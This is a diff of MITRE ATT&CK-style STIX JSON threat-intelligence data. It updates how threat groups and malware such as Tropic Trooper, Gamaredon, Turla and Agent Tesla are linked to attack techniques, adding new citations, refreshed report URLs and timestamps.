+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
}
],
- "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) enumerates the running processes on the system.(Citation: Unit 42 Tropic Trooper Nov 2016)",
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) is capable of enumerating the running processes on the system using pslist.(Citation: Unit 42 Tropic Trooper Nov 2016)(Citation: TrendMicro Tropic Trooper May 2020)",
"id": "relationship--17cafa26-57f1-4efb-9d23-1399cd2de4cd",
"source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
"relationship_type": "uses",
"target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
"type": "relationship",
- "modified": "2019-06-30T22:44:28.193Z",
+ "modified": "2020-05-29T03:23:28.026Z",
"created": "2019-01-29T20:17:49.270Z"
},
{
@@ -85230,12 +86368,12 @@
"url": "https://researchcenter.paloaltonetworks.com/2018/07/unit42-bisonal-malware-used-attacks-russia-south-korea/"
}
],
- "source_ref": "malware--65ffc206-d7c1-45b3-b543-f6b726e7840d",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-10-17T00:14:20.652Z"
+ "created": "2018-10-17T00:14:20.652Z",
+ "source_ref": "malware--65ffc206-d7c1-45b3-b543-f6b726e7840d",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e"
},
{
"id": "relationship--1ab99abc-fa2a-4cc5-8cb4-4116e305a819",
@@ -85246,7 +86384,7 @@
],
"external_references": [
{
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
"description": "Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.",
"source_name": "McAfee Honeybee"
}
@@ -85255,7 +86393,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4",
"type": "relationship",
- "modified": "2019-03-25T12:58:44.259Z",
+ "modified": "2020-04-16T19:41:40.635Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -85314,12 +86452,12 @@
"url": "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf"
}
],
- "source_ref": "malware--211cfe9f-2676-4e1c-a5f5-2c8091da2a68",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--211cfe9f-2676-4e1c-a5f5-2c8091da2a68",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add"
},
{
"id": "relationship--72f9bf47-61ac-42c8-acbf-65be7c25af0f",
@@ -85457,7 +86595,7 @@
{
"id": "relationship--ec8f73de-eab1-4d3b-88c0-7885716aa748",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Dark Caracal](https://attack.mitre.org/groups/G0070) took screen shots using their Windows malware.(Citation: Lookout Dark Caracal Jan 2018)",
+ "description": "[Dark Caracal](https://attack.mitre.org/groups/G0070) took screenshots using their Windows malware.(Citation: Lookout Dark Caracal Jan 2018)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -85472,7 +86610,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688",
"type": "relationship",
- "modified": "2019-07-16T15:35:20.968Z",
+ "modified": "2020-06-03T20:22:40.687Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -86557,12 +87695,12 @@
"url": "https://technet.microsoft.com/en-us/library/cc732643.aspx"
}
],
- "source_ref": "tool--cde2d700-9ed1-46cf-9bce-07364fe8b24f",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "tool--cde2d700-9ed1-46cf-9bce-07364fe8b24f",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4"
},
{
"id": "relationship--fcfe071b-e527-44e9-9970-9243a354f563",
@@ -86575,14 +87713,14 @@
{
"source_name": "Kaspersky Regin",
"description": "Kaspersky Lab's Global Research and Analysis Team. (2014, November 24). THE REGIN PLATFORM NATION-STATE OWNAGE OF GSM NETWORKS. Retrieved December 1, 2014.",
- "url": "https://securelist.com/files/2014/11/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf"
+ "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070305/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf"
}
],
"source_ref": "malware--4c59cce8-cb48-4141-b9f1-f646edfaadb0",
"relationship_type": "uses",
"target_ref": "attack-pattern--3257eb21-f9a7-4430-8de1-d8b6e288f529",
"type": "relationship",
- "modified": "2020-03-16T17:37:15.709Z",
+ "modified": "2020-06-29T01:54:53.389Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -86870,12 +88008,12 @@
"url": "https://twitter.com/Evi1cg/status/935027922397573120"
}
],
- "source_ref": "tool--90ec2b22-7061-4469-b539-0989ec4f96c2",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "tool--90ec2b22-7061-4469-b539-0989ec4f96c2",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--3b0e52ce-517a-4614-a523-1bd5deef6c5e"
},
{
"id": "relationship--39fdd17c-5f59-4daf-bf14-95841b5ec248",
@@ -87053,7 +88191,7 @@
{
"id": "relationship--911c0e63-10bc-4fbd-b7b7-0a9e318bb4f1",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[POWERSTATS](https://attack.mitre.org/software/S0223) uses PowerShell for obfuscation and execution.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: ClearSky MuddyWater Nov 2018)",
+ "description": "[POWERSTATS](https://attack.mitre.org/software/S0223) uses PowerShell for obfuscation and execution.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: ClearSky MuddyWater Nov 2018)(Citation: TrendMicro POWERSTATS V3 June 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -87067,13 +88205,18 @@
"description": "ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018.",
"url": "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf",
"source_name": "ClearSky MuddyWater Nov 2018"
+ },
+ {
+ "source_name": "TrendMicro POWERSTATS V3 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/",
+ "description": "Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020."
}
],
"source_ref": "malware--e8545794-b98c-492b-a5b3-4b5a02682e37",
"relationship_type": "uses",
"target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736",
"type": "relationship",
- "modified": "2019-04-22T22:36:53.081Z",
+ "modified": "2020-05-18T19:37:52.447Z",
"created": "2018-04-18T17:59:24.739Z"
},
{
@@ -87205,32 +88348,37 @@
{
"id": "relationship--e35a6a79-0ffc-4835-aaf8-e42dd20a7e45",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Patchwork](https://attack.mitre.org/groups/G0040) has used spearphishing with links to deliver files with exploits to initial victims. The group has used embedded image tags (known as web bugs) with unique, per-recipient tracking links in their emails for the purpose of identifying which recipients opened messages.(Citation: Symantec Patchwork)(Citation: TrendMicro Patchwork Dec 2017)(Citation: Volexity Patchwork June 2018)",
+ "description": "[Patchwork](https://attack.mitre.org/groups/G0040) has used spearphishing with links to deliver files with exploits to initial victims. The group has also used embedded image tags (known as web bugs) with unique, per-recipient tracking links in their emails for the purpose of identifying which recipients opened messages.(Citation: Symantec Patchwork)(Citation: TrendMicro Patchwork Dec 2017)(Citation: Volexity Patchwork June 2018)(Citation: Unit 42 BackConfig May 2020)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "source_name": "Symantec Patchwork",
+ "url": "http://www.symantec.com/connect/blogs/patchwork-cyberespionage-group-expands-targets-governments-wide-range-industries",
"description": "Hamada, J.. (2016, July 25). Patchwork cyberespionage group expands targets from governments to wide range of industries. Retrieved August 17, 2016.",
- "url": "http://www.symantec.com/connect/blogs/patchwork-cyberespionage-group-expands-targets-governments-wide-range-industries"
+ "source_name": "Symantec Patchwork"
},
{
- "url": "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf",
+ "source_name": "TrendMicro Patchwork Dec 2017",
"description": "Lunghi, D., et al. (2017, December). Untangling the Patchwork Cyberespionage Group. Retrieved July 10, 2018.",
- "source_name": "TrendMicro Patchwork Dec 2017"
+ "url": "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf"
},
{
- "source_name": "Volexity Patchwork June 2018",
+ "url": "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/",
"description": "Meltzer, M, et al. (2018, June 07). Patchwork APT Group Targets US Think Tanks. Retrieved July 16, 2018.",
- "url": "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/"
+ "source_name": "Volexity Patchwork June 2018"
+ },
+ {
+ "source_name": "Unit 42 BackConfig May 2020",
+ "url": "https://unit42.paloaltonetworks.com/updated-backconfig-malware-targeting-government-and-military-organizations/",
+ "description": "Hinchliffe, A. and Falcone, R. (2020, May 11). Updated BackConfig Malware Targeting Government and Military Organizations in South Asia. Retrieved June 17, 2020."
}
],
"source_ref": "intrusion-set--17862c7d-9e60-48a0-b48e-da4dc4c3f6b0",
"relationship_type": "uses",
"target_ref": "attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7",
"type": "relationship",
- "modified": "2019-07-11T13:53:05.996Z",
+ "modified": "2020-07-03T22:15:24.887Z",
"created": "2018-04-18T17:59:24.739Z"
},
{
@@ -87378,12 +88526,12 @@
"url": "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html"
}
],
- "source_ref": "malware--0ced8926-914e-4c78-bc93-356fb90dbd1f",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--0ced8926-914e-4c78-bc93-356fb90dbd1f",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c"
},
{
"id": "relationship--9c4a8336-5f5f-4e58-b00d-b6bf1c59ec03",
@@ -87610,14 +88758,14 @@
{
"source_name": "Kaspersky Regin",
"description": "Kaspersky Lab's Global Research and Analysis Team. (2014, November 24). THE REGIN PLATFORM NATION-STATE OWNAGE OF GSM NETWORKS. Retrieved December 1, 2014.",
- "url": "https://securelist.com/files/2014/11/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf"
+ "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070305/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf"
}
],
"source_ref": "malware--4c59cce8-cb48-4141-b9f1-f646edfaadb0",
"relationship_type": "uses",
"target_ref": "attack-pattern--f72eb8a8-cd4c-461d-a814-3f862befbf00",
"type": "relationship",
- "modified": "2020-03-16T17:37:15.712Z",
+ "modified": "2020-06-29T01:54:53.401Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -87629,37 +88777,42 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--60d50676-459a-47dd-92e9-a827a9fe9c58",
"relationship_type": "uses",
"target_ref": "attack-pattern--30973a08-aed9-4edf-8604-9084ce1b5c4f",
"type": "relationship",
- "modified": "2020-02-18T03:54:11.613Z",
+ "modified": "2020-04-21T23:09:31.600Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
"id": "relationship--f73df541-6b55-42d1-aec3-53660fda1508",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) has used various batch scripts to establish C2, download additional files, and conduct other functions.(Citation: Palo Alto Gamaredon Feb 2017)",
+ "description": "[Gamaredon Group](https://attack.mitre.org/groups/G0047) has used various batch scripts to establish C2 and download additional files. [Gamaredon Group](https://attack.mitre.org/groups/G0047)'s backdoor malware has also been written to a batch file.(Citation: Palo Alto Gamaredon Feb 2017)(Citation: ESET Gamaredon June 2020)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/",
- "description": "Kasza, A. and Reichel, D.. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
- "source_name": "Palo Alto Gamaredon Feb 2017"
+ "source_name": "Palo Alto Gamaredon Feb 2017",
+ "description": "Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
+ "url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"
+ },
+ {
+ "source_name": "ESET Gamaredon June 2020",
+ "url": "https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game/",
+ "description": "Boutin, J. (2020, June 11). Gamaredon group grows its game. Retrieved June 16, 2020."
}
],
"source_ref": "intrusion-set--2e290bfe-93b5-48ce-97d6-edcd6d32b7cf",
"relationship_type": "uses",
"target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
"type": "relationship",
- "modified": "2019-03-25T12:57:18.676Z",
+ "modified": "2020-06-22T17:54:16.027Z",
"created": "2017-05-31T21:33:27.080Z"
},
{
@@ -87757,14 +88910,14 @@
{
"source_name": "Kaspersky Regin",
"description": "Kaspersky Lab's Global Research and Analysis Team. (2014, November 24). THE REGIN PLATFORM NATION-STATE OWNAGE OF GSM NETWORKS. Retrieved December 1, 2014.",
- "url": "https://securelist.com/files/2014/11/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf"
+ "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070305/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf"
}
],
"source_ref": "malware--4c59cce8-cb48-4141-b9f1-f646edfaadb0",
"relationship_type": "uses",
"target_ref": "attack-pattern--69b8fd78-40e8-4600-ae4d-662c9d7afdb3",
"type": "relationship",
- "modified": "2020-03-23T16:14:53.767Z",
+ "modified": "2020-06-29T01:54:53.403Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -87819,7 +88972,7 @@
"external_references": [
{
"source_name": "Palo Alto Gamaredon Feb 2017",
- "description": "Kasza, A. and Reichel, D.. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
+ "description": "Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
"url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"
}
],
@@ -87827,7 +88980,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d",
"type": "relationship",
- "modified": "2020-03-17T02:15:40.376Z",
+ "modified": "2020-06-22T17:54:16.012Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -87916,22 +89069,27 @@
{
"id": "relationship--1ad674bb-c8e1-4f19-b96e-f56bfa10797c",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) used spearphishing emails with malicious Microsoft Word attachments to infect victims.(Citation: Symantec Tick Apr 2016)",
+ "description": "[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) used spearphishing emails with malicious Microsoft Word attachments to infect victims.(Citation: Symantec Tick Apr 2016)(Citation: Trend Micro Tick November 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "url": "https://www.symantec.com/connect/blogs/tick-cyberespionage-group-zeros-japan",
+ "source_name": "Symantec Tick Apr 2016",
"description": "DiMaggio, J. (2016, April 28). Tick cyberespionage group zeros in on Japan. Retrieved July 16, 2018.",
- "source_name": "Symantec Tick Apr 2016"
+ "url": "https://www.symantec.com/connect/blogs/tick-cyberespionage-group-zeros-japan"
+ },
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
}
],
"source_ref": "intrusion-set--93f52415-0fe4-4d3d-896c-fc9b8e88ab90",
"relationship_type": "uses",
"target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597",
"type": "relationship",
- "modified": "2019-03-22T19:57:37.367Z",
+ "modified": "2020-06-24T01:27:31.906Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -87948,12 +89106,12 @@
"url": "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
}
],
- "source_ref": "malware--b1de6916-7a22-4460-8d26-6b5483ffaa2a",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--4ab929c6-ee2d-4fb5-aab4-b14be2ed7179",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--b1de6916-7a22-4460-8d26-6b5483ffaa2a",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--4ab929c6-ee2d-4fb5-aab4-b14be2ed7179"
},
{
"id": "relationship--3210e5dd-fd8b-42e6-9933-9c4e0c3bbf6b",
@@ -87964,7 +89122,7 @@
],
"external_references": [
{
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
"description": "Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.",
"source_name": "McAfee Honeybee"
}
@@ -87973,7 +89131,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d",
"type": "relationship",
- "modified": "2019-03-25T12:58:44.262Z",
+ "modified": "2020-04-16T19:41:40.650Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -88600,12 +89758,12 @@
"url": "http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/"
}
],
- "source_ref": "malware--463f68f1-5cde-4dc2-a831-68b73488f8f4",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--463f68f1-5cde-4dc2-a831-68b73488f8f4",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d"
},
{
"id": "relationship--abd0cc1c-8901-4645-8853-c394ae8c573c",
@@ -88684,12 +89842,12 @@
"url": "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf"
}
],
- "source_ref": "malware--49abab73-3c5c-476e-afd5-69b5c732d845",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--322bad5a-1c49-4d23-ab79-76d641794afa",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--49abab73-3c5c-476e-afd5-69b5c732d845",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--322bad5a-1c49-4d23-ab79-76d641794afa"
},
{
"id": "relationship--ad696f42-0631-43fb-893b-a5616f14f93f",
@@ -88722,7 +89880,7 @@
"external_references": [
{
"source_name": "Palo Alto Gamaredon Feb 2017",
- "description": "Kasza, A. and Reichel, D.. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
+ "description": "Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
"url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"
}
],
@@ -88730,7 +89888,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c",
"type": "relationship",
- "modified": "2020-03-17T14:47:04.811Z",
+ "modified": "2020-06-22T17:54:16.021Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -88764,7 +89922,7 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--451a9977-d255-43c9-b431-66de80130c8c",
"type": "relationship",
- "modified": "2020-01-22T20:28:29.846Z",
+ "modified": "2020-07-01T18:27:41.884Z",
"created": "2018-04-18T17:59:24.739Z"
},
{
@@ -88818,16 +89976,16 @@
],
"external_references": [
{
- "source_name": "F-Secure BlackEnergy 2014",
+ "url": "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf",
"description": "F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.",
- "url": "https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdf"
+ "source_name": "F-Secure BlackEnergy 2014"
}
],
"source_ref": "malware--54cc1d4f-5c53-4f0e-9ef5-11b4998e82e4",
"relationship_type": "uses",
"target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
"type": "relationship",
- "modified": "2020-03-17T00:25:19.480Z",
+ "modified": "2020-06-02T16:14:00.463Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -89145,12 +90303,12 @@
"url": "https://technet.microsoft.com/en-us/library/bb490947.aspx"
}
],
- "source_ref": "tool--4664b683-f578-434f-919b-1c1aad2a1111",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "tool--4664b683-f578-434f-919b-1c1aad2a1111",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--7e150503-88e7-4861-866b-ff1ac82c4475"
},
{
"id": "relationship--f9906a11-8ac7-4bd4-9c28-c58834ff593b",
@@ -89253,18 +90411,23 @@
"description": "The DigiTrust Group. (2017, January 12). The Rise of Agent Tesla. Retrieved November 5, 2018."
},
{
- "description": "Zhang, X. (2017, June 28). In-Depth Analysis of A New Variant of .NET Malware AgentTesla. Retrieved November 5, 2018.",
+ "source_name": "Fortinet Agent Tesla June 2017",
"url": "https://www.fortinet.com/blog/threat-research/in-depth-analysis-of-net-malware-javaupdtr.html",
- "source_name": "Fortinet Agent Tesla June 2017"
+ "description": "Zhang, X. (2017, June 28). In-Depth Analysis of A New Variant of .NET Malware AgentTesla. Retrieved November 5, 2018."
+ },
+ {
+ "source_name": "Bitdefender Agent Tesla April 2020",
+ "url": "https://labs.bitdefender.com/2020/04/oil-gas-spearphishing-campaigns-drop-agent-tesla-spyware-in-advance-of-historic-opec-deal/",
+ "description": "Arsene, L. (2020, April 21). Oil & Gas Spearphishing Campaigns Drop Agent Tesla Spyware in Advance of Historic OPEC+ Deal. Retrieved May 19, 2020."
}
],
- "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) can log keystrokes on the victim\u2019s machine.(Citation: Talos Agent Tesla Oct 2018)(Citation: DigiTrust Agent Tesla Jan 2017)(Citation: Fortinet Agent Tesla June 2017)",
+ "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) can log keystrokes on the victim\u2019s machine.(Citation: Talos Agent Tesla Oct 2018)(Citation: DigiTrust Agent Tesla Jan 2017)(Citation: Fortinet Agent Tesla June 2017)(Citation: Bitdefender Agent Tesla April 2020)",
"id": "relationship--891217a4-3822-4345-b77f-448f41fd9361",
"source_ref": "malware--e7a5229f-05eb-440e-b982-9a6d2b2b87c8",
"relationship_type": "uses",
"target_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4",
"type": "relationship",
- "modified": "2020-03-18T19:25:30.281Z",
+ "modified": "2020-05-20T13:38:07.005Z",
"created": "2019-01-29T18:44:05.133Z"
},
{
@@ -89345,15 +90508,20 @@
"description": "Ray, V. (2016, November 22). Tropic Trooper Targets Taiwanese Government and Fossil Fuel Provider With Poison Ivy. Retrieved November 9, 2018.",
"url": "https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/",
"source_name": "Unit 42 Tropic Trooper Nov 2016"
+ },
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
}
],
- "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) creates the Registry key HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell and sets the value to establish persistence.(Citation: Unit 42 Tropic Trooper Nov 2016)",
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has created the Registry key HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell and sets the value to establish persistence.(Citation: Unit 42 Tropic Trooper Nov 2016)(Citation: TrendMicro Tropic Trooper May 2020)",
"id": "relationship--ad3bca07-c2d2-411f-9bd8-bf4e1142d9ae",
"source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
"relationship_type": "uses",
"target_ref": "attack-pattern--6836813e-8ec8-4375-b459-abb388cb1a35",
"type": "relationship",
- "modified": "2019-06-30T22:44:28.212Z",
+ "modified": "2020-05-29T03:23:28.048Z",
"created": "2019-01-29T20:17:49.278Z"
},
{
@@ -89996,7 +91164,7 @@
{
"id": "relationship--3325e625-d76b-42df-b952-749dabb57517",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Turla](https://attack.mitre.org/groups/G0010) surveys a system upon check-in to discover active local network connections using the netstat -an, net use, net file, and net session commands.(Citation: Kaspersky Turla) [Turla](https://attack.mitre.org/groups/G0010) RPC backdoors have also enumerated the IPv4 TCP connection table via the GetTcpTable2 API call.(Citation: ESET Turla PowerShell May 2019)",
+ "description": "[Turla](https://attack.mitre.org/groups/G0010) surveys a system upon check-in to discover active local network connections using the netstat -an, net use, net file, and net session commands.(Citation: Kaspersky Turla)(Citation: ESET ComRAT May 2020) [Turla](https://attack.mitre.org/groups/G0010) RPC backdoors have also enumerated the IPv4 TCP connection table via the GetTcpTable2 API call.(Citation: ESET Turla PowerShell May 2019)",
"object_marking_refs": [
